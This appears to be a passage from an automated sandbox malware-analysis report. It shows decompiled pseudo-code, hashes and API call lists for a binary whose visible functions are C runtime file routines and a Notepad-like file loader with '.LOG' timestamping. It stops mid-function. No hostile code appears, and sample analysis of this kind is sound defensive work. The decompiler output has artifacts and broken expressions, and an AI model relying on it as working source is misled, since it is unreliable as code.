                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInfoInitializeLineStartupStrings___crt___security_init_cookie__cinit__ioinit0__setargv__setenvp__wincmdln
                                                  • String ID:
                                                  • API String ID: 505799540-0
                                                  • Opcode ID: 4fccd157fe94d333a7eaf6cf35a1c31cb0a613b4942d5e277b8e572f4a5275fb
                                                  • Instruction ID: bb0d11083d0c81fca1b6b01f832cb33cfc5d6ab3b3a98d697324626250d2dd96
                                                  • Opcode Fuzzy Hash: 4fccd157fe94d333a7eaf6cf35a1c31cb0a613b4942d5e277b8e572f4a5275fb
                                                  • Instruction Fuzzy Hash: E321D374A4030BDADB607BF4B845FEE3194BF20705FD4816AF6C49E0C6EFB689408691
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  C-Code - Quality: 69%
                                                  			E010A35B7(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                  				char* _v8;
                                                  				signed int _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				void* __ebx;
                                                  				void* __esi;
                                                  				signed int _t74;
                                                  				signed int _t78;
                                                  				char _t81;
                                                  				signed int _t86;
                                                  				signed int _t88;
                                                  				signed int _t91;
                                                  				signed int _t94;
                                                  				signed int _t97;
                                                  				signed int _t98;
                                                  				char* _t99;
                                                  				signed int _t100;
                                                  				signed int _t102;
                                                  				signed int _t103;
                                                  				signed int _t104;
                                                  				char* _t110;
                                                  				signed int _t113;
                                                  				signed int _t117;
                                                  				signed int _t119;
                                                  				void* _t120;
                                                  
                                                  				_t99 = _a4;
                                                  				_t74 = _a8;
                                                  				_v8 = _t99;
                                                  				_v12 = _t74;
                                                  				if(_a12 == 0) {
                                                  					L5:
                                                  					return 0;
                                                  				}
                                                  				_t97 = _a16;
                                                  				if(_t97 == 0) {
                                                  					goto L5;
                                                  				}
                                                  				if(_t99 != 0) {
                                                  					_t119 = _a20;
                                                  					__eflags = _t119;
                                                  					if(_t119 == 0) {
                                                  						L9:
                                                  						__eflags = _a8 - 0xffffffff;
                                                  						if(_a8 != 0xffffffff) {
                                                  							_t74 = E010A66E0(_t99, 0, _a8);
                                                  							_t120 = _t120 + 0xc;
                                                  						}
                                                  						__eflags = _t119;
                                                  						if(_t119 == 0) {
                                                  							goto L3;
                                                  						} else {
                                                  							_t78 = _t74 | 0xffffffff;
                                                  							__eflags = _t97 - _t78 / _a12;
                                                  							if(_t97 > _t78 / _a12) {
                                                  								goto L3;
                                                  							}
                                                  							L13:
                                                  							_t117 = _a12 * _t97;
                                                  							__eflags =  *(_t119 + 0xc) & 0x0000010c;
                                                  							_t98 = _t117;
                                                  							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                                                  								_t100 = 0x1000;
                                                  							} else {
                                                  								_t100 =  *(_t119 + 0x18);
                                                  							}
                                                  							_v16 = _t100;
                                                  							__eflags = _t117;
                                                  							if(_t117 == 0) {
                                                  								L41:
                                                  								return _a16;
                                                  							} else {
                                                  								do {
                                                  									__eflags =  *(_t119 + 0xc) & 0x0000010c;
                                                  									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                                                  										L24:
                                                  										__eflags = _t98 - _t100;
                                                  										if(_t98 < _t100) {
                                                  											_t81 = E010A6582(_t98, _t119, _t119); // executed
                                                  											__eflags = _t81 - 0xffffffff;
                                                  											if(_t81 == 0xffffffff) {
                                                  												L46:
                                                  												return (_t117 - _t98) / _a12;
                                                  											}
                                                  											_t102 = _v12;
                                                  											__eflags = _t102;
                                                  											if(_t102 == 0) {
                                                  												L42:
                                                  												__eflags = _a8 - 0xffffffff;
                                                  												if(_a8 != 0xffffffff) {
                                                  													E010A66E0(_a4, 0, _a8);
                                                  												}
                                                  												 *((intOrPtr*)(E010A6117())) = 0x22;
                                                  												L4:
                                                  												E010A4035();
                                                  												goto L5;
                                                  											}
                                                  											_t110 = _v8;
                                                  											 *_t110 = _t81;
                                                  											_t98 = _t98 - 1;
                                                  											_t103 = _t102 - 1;
                                                  											__eflags = _t103;
                                                  											_v12 = _t103;
                                                  											_t100 =  *(_t119 + 0x18);
                                                  											_v8 = _t110 + 1;
                                                  											_v16 = _t100;
                                                  											goto L40;
                                                  										}
                                                  										__eflags = _t100;
                                                  										if(_t100 == 0) {
                                                  											_t86 = 0x7fffffff;
                                                  											__eflags = _t98 - 0x7fffffff;
                                                  											if(_t98 <= 0x7fffffff) {
                                                  												_t86 = _t98;
                                                  											}
                                                  										} else {
                                                  											__eflags = _t98 - 0x7fffffff;
                                                  											if(_t98 <= 0x7fffffff) {
                                                  												_t44 = _t98 % _t100;
                                                  												__eflags = _t44;
                                                  												_t113 = _t44;
                                                  												_t91 = _t98;
                                                  											} else {
                                                  												_t113 = 0x7fffffff % _t100;
                                                  												_t91 = 0x7fffffff;
                                                  											}
                                                  											_t86 = _t91 - _t113;
                                                  										}
                                                  										__eflags = _t86 - _v12;
                                                  										if(_t86 > _v12) {
                                                  											goto L42;
                                                  										} else {
                                                  											_push(_t86);
                                                  											_push(_v8);
                                                  											_push(E010A66B0(_t119)); // executed
                                                  											_t88 = E010A6885(); // executed
                                                  											_t120 = _t120 + 0xc;
                                                  											__eflags = _t88;
                                                  											if(_t88 == 0) {
                                                  												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
                                                  												goto L46;
                                                  											}
                                                  											__eflags = _t88 - 0xffffffff;
                                                  											if(_t88 == 0xffffffff) {
                                                  												L45:
                                                  												_t64 = _t119 + 0xc;
                                                  												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
                                                  												__eflags =  *_t64;
                                                  												goto L46;
                                                  											}
                                                  											_t98 = _t98 - _t88;
                                                  											__eflags = _t98;
                                                  											L36:
                                                  											_v8 = _v8 + _t88;
                                                  											_v12 = _v12 - _t88;
                                                  											_t100 = _v16;
                                                  											goto L40;
                                                  										}
                                                  									}
                                                  									_t94 =  *(_t119 + 4);
                                                  									_v20 = _t94;
                                                  									__eflags = _t94;
                                                  									if(__eflags == 0) {
                                                  										goto L24;
                                                  									}
                                                  									if(__eflags < 0) {
                                                  										goto L45;
                                                  									}
                                                  									__eflags = _t98 - _t94;
                                                  									if(_t98 < _t94) {
                                                  										_t94 = _t98;
                                                  										_v20 = _t98;
                                                  									}
                                                  									_t104 = _v12;
                                                  									__eflags = _t94 - _t104;
                                                  									if(_t94 > _t104) {
                                                  										goto L42;
                                                  									} else {
                                                  										E010A40B0(_v8, _t104,  *_t119, _t94);
                                                  										_t88 = _v20;
                                                  										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
                                                  										_t120 = _t120 + 0x10;
                                                  										_t98 = _t98 - _t88;
                                                  										 *_t119 =  *_t119 + _t88;
                                                  										goto L36;
                                                  									}
                                                  									L40:
                                                  									__eflags = _t98;
                                                  								} while (_t98 != 0);
                                                  								goto L41;
                                                  							}
                                                  						}
                                                  					}
                                                  					_t74 = (_t74 | 0xffffffff) / _a12;
                                                  					__eflags = _t97 - _t74;
                                                  					if(_t97 <= _t74) {
                                                  						goto L13;
                                                  					}
                                                  					goto L9;
                                                  				}
                                                  				L3:
                                                  				 *((intOrPtr*)(E010A6117())) = 0x16;
                                                  				goto L4;
                                                  			}




























                                                  0x010a36bd
                                                  0x010a36ab
                                                  0x010a36b0
                                                  0x010a36b2
                                                  0x010a36b2
                                                  0x010a36bf
                                                  0x010a36bf
                                                  0x010a36d2
                                                  0x010a36d5
                                                  0x00000000
                                                  0x010a36d7
                                                  0x010a36d7
                                                  0x010a36d8
                                                  0x010a36e2
                                                  0x010a36e3
                                                  0x010a36e8
                                                  0x010a36eb
                                                  0x010a36ed
                                                  0x010a3774
                                                  0x00000000
                                                  0x010a3774
                                                  0x010a36f3
                                                  0x010a36f6
                                                  0x010a3762
                                                  0x010a3762
                                                  0x010a3762
                                                  0x010a3762
                                                  0x00000000
                                                  0x010a3762
                                                  0x010a36f8
                                                  0x010a36f8
                                                  0x010a36fa
                                                  0x010a36fa
                                                  0x010a36fd
                                                  0x010a3700
                                                  0x00000000
                                                  0x010a3700
                                                  0x010a36d5
                                                  0x010a365a
                                                  0x010a365d
                                                  0x010a3660
                                                  0x010a3662
                                                  0x00000000
                                                  0x00000000
                                                  0x010a3664
                                                  0x00000000
                                                  0x00000000
                                                  0x010a366a
                                                  0x010a366c
                                                  0x010a366e
                                                  0x010a3670
                                                  0x010a3670
                                                  0x010a3673
                                                  0x010a3676
                                                  0x010a3678
                                                  0x00000000
                                                  0x010a367e
                                                  0x010a3685
                                                  0x010a368a
                                                  0x010a368d
                                                  0x010a3690
                                                  0x010a3693
                                                  0x010a3695
                                                  0x00000000
                                                  0x010a3695
                                                  0x010a372c
                                                  0x010a372c
                                                  0x010a372c
                                                  0x00000000
                                                  0x010a3651
                                                  0x010a364b
                                                  0x010a361d
                                                  0x010a3600
                                                  0x010a3603
                                                  0x010a3605
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a3605
                                                  0x010a35dd
                                                  0x010a35e2
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                  • String ID:
                                                  • API String ID: 1559183368-0
                                                  • Opcode ID: 4d6326407d16fd6ecb703112db2abd710cec160eff3c598c81bf8f1d6820594c
                                                  • Instruction ID: 03de53f831ed53d6c2f9db541f6c2260e8aa66c704e26a0ef70c28460fee21c8
                                                  • Opcode Fuzzy Hash: 4d6326407d16fd6ecb703112db2abd710cec160eff3c598c81bf8f1d6820594c
                                                  • Instruction Fuzzy Hash: 5751B470A007069BDB648FFDC8846AE7FF1BF14360F948769E9A59E2D0D771D9508B40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 159 10add2e-10add46 call 10a42de 162 10add48-10add4c 159->162 163 10add4d-10add63 call 10b30f1 159->163 165 10add68-10add79 call 10a8c4b 163->165
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: ___copy_path_to_wide_string__wsopen_nolock_free
                                                  • String ID:
                                                  • API String ID: 1272159912-0
                                                  • Opcode ID: c7a9c380249c97d1de4214cd3054ea736285430e00f9b7ef0eded777385428fa
                                                  • Instruction ID: abfa8125e4be7da5abc2296f67b1d263cecdcb8eb55dfc7bd021acb23cca5fe5
                                                  • Opcode Fuzzy Hash: c7a9c380249c97d1de4214cd3054ea736285430e00f9b7ef0eded777385428fa
                                                  • Instruction Fuzzy Hash: 85F01C3691011AFBDF169FD4DD019DE7BAAEF082A8F504151F910A50A0E776CA60AB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 168 10a3795-10a37a9 call 10a61f0 171 10a37ab-10a37ae 168->171 172 10a37dc 168->172 171->172 174 10a37b0-10a37b5 171->174 173 10a37de-10a37e3 call 10a6235 172->173 176 10a37b7-10a37bb 174->176 177 10a37e4-10a37fb call 10a4bf4 call 10a35b7 174->177 180 10a37cc-10a37d7 call 10a6117 call 10a4035 176->180 181 10a37bd-10a37c9 call 10a66e0 176->181 189 10a3800-10a3816 call 10a381e 177->189 180->172 181->180 189->173
                                                  C-Code - Quality: 89%
                                                  			E010A3795(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                  				intOrPtr _t16;
                                                  				intOrPtr _t19;
                                                  				intOrPtr _t29;
                                                  				void* _t32;
                                                  
                                                  				_push(0xc);
                                                  				_push(0x10bef60);
                                                  				E010A61F0(__ebx, __edi, __esi);
                                                  				 *((intOrPtr*)(_t32 - 0x1c)) = 0;
                                                  				if( *((intOrPtr*)(_t32 + 0x10)) == 0 ||  *((intOrPtr*)(_t32 + 0x14)) == 0) {
                                                  					L6:
                                                  					_t16 = 0;
                                                  				} else {
                                                  					_t31 =  *((intOrPtr*)(_t32 + 0x18));
                                                  					if( *((intOrPtr*)(_t32 + 0x18)) != 0) {
                                                  						E010A4BF4(_t31);
                                                  						 *((intOrPtr*)(_t32 - 4)) = 0;
                                                  						_t19 = E010A35B7( *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)), _t31); // executed
                                                  						_t29 = _t19;
                                                  						 *((intOrPtr*)(_t32 - 0x1c)) = _t29;
                                                  						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
                                                  						E010A381E(_t31);
                                                  						_t16 = _t29;
                                                  					} else {
                                                  						if( *((intOrPtr*)(_t32 + 0xc)) != 0xffffffff) {
                                                  							E010A66E0( *((intOrPtr*)(_t32 + 8)), 0,  *((intOrPtr*)(_t32 + 0xc)));
                                                  						}
                                                  						 *((intOrPtr*)(E010A6117())) = 0x16;
                                                  						E010A4035();
                                                  						goto L6;
                                                  					}
                                                  				}
                                                  				return E010A6235(_t16);
                                                  			}








                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: __lock_file_memset
                                                  • String ID:
                                                  • API String ID: 26237723-0
                                                  • Opcode ID: dea218494c5c7883b4129b0ab64134ba89a04883f21013c3feb5ee6d06c9c466
                                                  • Instruction ID: 40c8b5c6c8b175dfa9b1f6a3c93c779789ca0ea845ccee8643c0e8df9a39a2dd
                                                  • Opcode Fuzzy Hash: dea218494c5c7883b4129b0ab64134ba89a04883f21013c3feb5ee6d06c9c466
                                                  • Instruction Fuzzy Hash: D301447590020AABCF22AFE98C049DE7FB1BF50360F988255F9A85E150D772C611DF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 84%
                                                  			E010A3B7F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                  				signed int _t12;
                                                  				signed int _t14;
                                                  				signed int _t23;
                                                  				void* _t26;
                                                  
                                                  				_push(0xc);
                                                  				_push(0x10bef80);
                                                  				E010A61F0(__ebx, __edi, __esi);
                                                  				_t25 =  *((intOrPtr*)(_t26 + 8));
                                                  				if((0 |  *((intOrPtr*)(_t26 + 8)) != 0x00000000) != 0) {
                                                  					E010A4BF4(_t25);
                                                  					 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
                                                  					_t12 = E010A3826(__edx, __edi, _t25, _t25); // executed
                                                  					_t23 = _t12;
                                                  					 *(_t26 - 0x1c) = _t23;
                                                  					 *(_t26 - 4) = 0xfffffffe;
                                                  					E010A3BDF(_t25);
                                                  					_t14 = _t23;
                                                  				} else {
                                                  					 *((intOrPtr*)(E010A6117())) = 0x16;
                                                  					_t14 = E010A4035() | 0xffffffff;
                                                  				}
                                                  				return E010A6235(_t14);
                                                  			}








                                                  APIs
                                                  • __lock_file.LIBCMT ref: 010A3BAF
                                                  • __ftell_nolock.LIBCMT ref: 010A3BBA
                                                    • Part of subcall function 010A6117: __getptd_noexit.LIBCMT ref: 010A6117
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                  • String ID:
                                                  • API String ID: 2999321469-0
                                                  • Opcode ID: 07376c561abbfaf124d1d81cb0169a2ad470452f82e7ee4c556fb1ec5fd170ce
                                                  • Instruction ID: d637f7f4f60539a48ded8785235205b64901df0bafa6b43fa427d41406e5476d
                                                  • Opcode Fuzzy Hash: 07376c561abbfaf124d1d81cb0169a2ad470452f82e7ee4c556fb1ec5fd170ce
                                                  • Instruction Fuzzy Hash: BEE09231A11607A6D7117BF88C01BDE7AA17F21374FED4255E1A4EF2C1CFB89E019651
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 210 10a3542-10a3556 call 10a347e
                                                  C-Code - Quality: 25%
                                                  			E010A3542(intOrPtr _a4, intOrPtr _a8) {
                                                  				void* __ebp;
                                                  				void* _t3;
                                                  				void* _t4;
                                                  				void* _t5;
                                                  				void* _t6;
                                                  				void* _t7;
                                                  				void* _t8;
                                                  				void* _t11;
                                                  
                                                  				_push(0x40);
                                                  				_push(_a8);
                                                  				_push(_a4);
                                                  				_t3 = E010A347E(_t4, _t5, _t6, _t7, _t8, _t11); // executed
                                                  				return _t3;
                                                  			}












                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: __fsopen
                                                  • String ID:
                                                  • API String ID: 3646066109-0
                                                  • Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                  • Instruction ID: 5b134e968a5a27c46262d4bfe97b94f4c03f3dab7c044ce7a1d92296938da62e
                                                  • Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                  • Instruction Fuzzy Hash: 65B0927644020C77CE022AC2EC02A993B19AB51660F408020FB4C1C560EA73A6A09689
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 92%
                                                  			E010A1140(WCHAR* __ecx, int __edx) {
                                                  				long _v8;
                                                  				long _v12;
                                                  				int _v16;
                                                  				short _v28;
                                                  				int _t26;
                                                  				long _t27;
                                                  				int _t33;
                                                  				void* _t36;
                                                  				signed int _t37;
                                                  				int _t56;
                                                  				long _t60;
                                                  				void _t66;
                                                  				int _t68;
                                                  				int _t73;
                                                  				void* _t74;
                                                  				int _t77;
                                                  				short _t78;
                                                  				WCHAR* _t84;
                                                  				void* _t85;
                                                  				int _t87;
                                                  				int _t88;
                                                  				void* _t89;
                                                  				void* _t92;
                                                  				void* _t93;
                                                  
                                                  				_t73 = __edx;
                                                  				_t84 = __ecx;
                                                  				_t88 = GetWindowTextLengthW( *0x10c3f2c);
                                                  				if(SendMessageW( *0x10c3f2c, 0xb8, 0, 0) == 0) {
                                                  					L9:
                                                  					_t26 = CreateFileW(_t84, 0x80000000, 3, 0, 3, 0x80, 0);
                                                  					_t85 = _t26;
                                                  					if(_t85 == 0xffffffff) {
                                                  						goto L43;
                                                  					} else {
                                                  						_t27 = GetFileSize(_t85, 0);
                                                  						_v8 = _t27;
                                                  						if(_t27 != 0xffffffff) {
                                                  							_t89 = HeapAlloc(GetProcessHeap(), 0, _t27 + 2);
                                                  							if(_t89 == 0) {
                                                  								goto L11;
                                                  							} else {
                                                  								_t33 = ReadFile(_t85, _t89, _v8,  &_v12, 0);
                                                  								_push(_t85);
                                                  								if(_t33 != 0) {
                                                  									CloseHandle();
                                                  									_t77 = _v12;
                                                  									_v8 = _t77;
                                                  									if(_t73 != 0xffffffff) {
                                                  										if(_t77 >= 2 && (_t73 == 1 || _t73 == 2)) {
                                                  											_t66 =  *_t89;
                                                  											if(_t66 != 0xff ||  *((char*)(_t89 + 1)) != 0xfe) {
                                                  												if(_t66 == 0xfe) {
                                                  													_t73 =  ==  ? 2 : _t73;
                                                  												}
                                                  											} else {
                                                  												_t73 = 1;
                                                  											}
                                                  										}
                                                  									} else {
                                                  										_t68 = E010A10E0(_t89, _t77);
                                                  										_t77 = _v8;
                                                  										_t73 = _t68;
                                                  									}
                                                  									_t36 = _t73 - 1;
                                                  									if(_t36 == 0 || _t36 == 1) {
                                                  										_t74 = _t89;
                                                  										_t87 = _t77 >> 1;
                                                  										goto L31;
                                                  									} else {
                                                  										_t56 =  ==  ? 0xfde9 : 0;
                                                  										_v16 = _t56;
                                                  										_t87 = MultiByteToWideChar(_t56, 0, _t89, _t77, 0, 0);
                                                  										_t60 = HeapAlloc(GetProcessHeap(), 0, 2 + _t87 * 2);
                                                  										_t74 = _t60;
                                                  										if(_t74 != 0) {
                                                  											MultiByteToWideChar(_v16, 0, _t89, _v8, _t74, _t87);
                                                  											HeapFree(GetProcessHeap(), 0, _t89);
                                                  											L31:
                                                  											_t37 = 0;
                                                  											if(_t87 > 0) {
                                                  												_t14 = _t37 + 0x20; // 0x20
                                                  												_t78 = _t14;
                                                  												do {
                                                  													if( *((short*)(_t74 + _t37 * 2)) == 0) {
                                                  														 *((short*)(_t74 + _t37 * 2)) = _t78;
                                                  													}
                                                  													_t37 = _t37 + 1;
                                                  												} while (_t37 < _t87);
                                                  											}
                                                  											 *((short*)(_t74 + _t87 * 2)) = 0;
                                                  											if(_t87 < 1 ||  *_t74 != 0xfeff) {
                                                  												_push(_t74);
                                                  											} else {
                                                  												_t21 = _t74 + 2; // 0x2
                                                  											}
                                                  											SetWindowTextW( *0x10c3f2c, ??);
                                                  											HeapFree(GetProcessHeap(), 0, _t74);
                                                  											SendMessageW( *0x10c3f2c, 0xb9, 0, 0);
                                                  											SendMessageW( *0x10c3f2c, 0xcd, 0, 0);
                                                  											SetFocus( *0x10c3f2c);
                                                  											_t26 = GetWindowTextW( *0x10c3f2c,  &_v28, 0);
                                                  											if(_t26 != 0) {
                                                  												_t26 = lstrcmpW( &_v28, L".LOG");
                                                  												if(_t26 == 0) {
                                                  													SendMessageW( *0x10c3f2c, 0xb1, GetWindowTextLengthW( *0x10c3f2c), 0xffffffff);
                                                  													SendMessageW( *0x10c3f2c, 0xc2, 1, L"\r\n");
                                                  													E010A2150();
                                                  													return SendMessageW( *0x10c3f2c, 0xc2, 1, L"\r\n");
                                                  												}
                                                  											}
                                                  											goto L43;
                                                  										} else {
                                                  											return HeapFree(GetProcessHeap(), _t60, _t89);
                                                  										}
                                                  									}
                                                  								} else {
                                                  									CloseHandle();
                                                  									return HeapFree(GetProcessHeap(), 0, _t89);
                                                  								}
                                                  							}
                                                  						} else {
                                                  							L11:
                                                  							return CloseHandle(_t85);
                                                  						}
                                                  					}
                                                  				} else {
                                                  					_t26 =  *0x10c43b0;
                                                  					if(_t88 != 0 || _t26 != 0) {
                                                  						_t92 = _t88 - 2;
                                                  						if(_t92 == 0) {
                                                  							L43:
                                                  							return _t26;
                                                  						} else {
                                                  							_t93 = _t92 - 4;
                                                  							if(_t93 == 0) {
                                                  								if(_t26 != 0) {
                                                  									goto L9;
                                                  								} else {
                                                  									_t26 = E010A1770();
                                                  									if(_t26 == 0) {
                                                  										goto L43;
                                                  									} else {
                                                  										goto L9;
                                                  									}
                                                  								}
                                                  							} else {
                                                  								if(_t93 == 1) {
                                                  									goto L9;
                                                  								} else {
                                                  									return _t26;
                                                  								}
                                                  							}
                                                  						}
                                                  					} else {
                                                  						goto L9;
                                                  					}
                                                  				}
                                                  			}




























                                                  APIs
                                                  • GetWindowTextLengthW.USER32 ref: 010A1153
                                                  • SendMessageW.USER32(000000B8,00000000,00000000), ref: 010A116A
                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A11C0
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A11D4
                                                  • CloseHandle.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A11E3
                                                  • GetProcessHeap.KERNEL32(00000000,-00000002,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A11F6
                                                  • HeapAlloc.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A11FD
                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A1214
                                                  • CloseHandle.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A121F
                                                  • HeapFree.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A1230
                                                  • CloseHandle.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A123D
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A12B1
                                                  • HeapAlloc.KERNEL32(00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A12CB
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A12D9
                                                  • HeapFree.KERNEL32(00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A12E0
                                                    • Part of subcall function 010A1770: _memset.LIBCMT ref: 010A1781
                                                    • Part of subcall function 010A1770: lstrcpyW.KERNEL32 ref: 010A1795
                                                    • Part of subcall function 010A1770: GetSaveFileNameW.COMDLG32(?), ref: 010A17FD
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A12F8
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A1307
                                                  • HeapFree.KERNEL32(00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A130A
                                                  • SetWindowTextW.USER32(00000000), ref: 010A1359
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A1362
                                                  • HeapFree.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A1365
                                                  • SendMessageW.USER32(000000B9,00000000,00000000), ref: 010A1380
                                                  • SendMessageW.USER32(000000CD,00000000,00000000), ref: 010A1391
                                                  • SetFocus.USER32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A1399
                                                  • GetWindowTextW.USER32 ref: 010A13AB
                                                  • lstrcmpW.KERNEL32(?,.LOG,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A13BE
                                                  • GetWindowTextLengthW.USER32(000000FF), ref: 010A13D0
                                                  • SendMessageW.USER32(000000B1,00000000,?,80000000), ref: 010A13E2
                                                  • SendMessageW.USER32(000000C2,00000001,010BEE24), ref: 010A13F6
                                                  • SendMessageW.USER32(000000C2,00000001,010BEE24), ref: 010A140F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Heap$MessageSend$FileFreeProcessTextWindow$CloseHandle$AllocByteCharLengthMultiWide$CreateFocusNameReadSaveSize_memsetlstrcmplstrcpy
                                                  • String ID: .LOG
                                                  • API String ID: 597183282-2272326732
                                                  • Opcode ID: 9e0341d5d14a1de73616a7d6ef55f6286cb74d53c09b4e71e600cb12abdac55c
                                                  • Instruction ID: f1d4bd0fd3d428322d88ab0b2ab9a28689df52f255d06a9da6523ac5bdf679e1
                                                  • Opcode Fuzzy Hash: 9e0341d5d14a1de73616a7d6ef55f6286cb74d53c09b4e71e600cb12abdac55c
                                                  • Instruction Fuzzy Hash: 2F81E832640205BBFB315BF8ADC9FEA3B79EB45750F508961FAC5EA1C4CB7688018B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010A2150() {
                                                  				struct _SYSTEMTIME _v20;
                                                  				void* _v532;
                                                  
                                                  				GetLocalTime( &_v20);
                                                  				GetTimeFormatW(0x400, 2,  &_v20, 0,  &_v532, 0xff);
                                                  				SendMessageW( *0x10c3f2c, 0xc2, 1,  &_v532);
                                                  				SendMessageW( *0x10c3f2c, 0xc2, 1, " ");
                                                  				GetDateFormatW(0x400, 0,  &_v20, 0,  &_v532, 0xff);
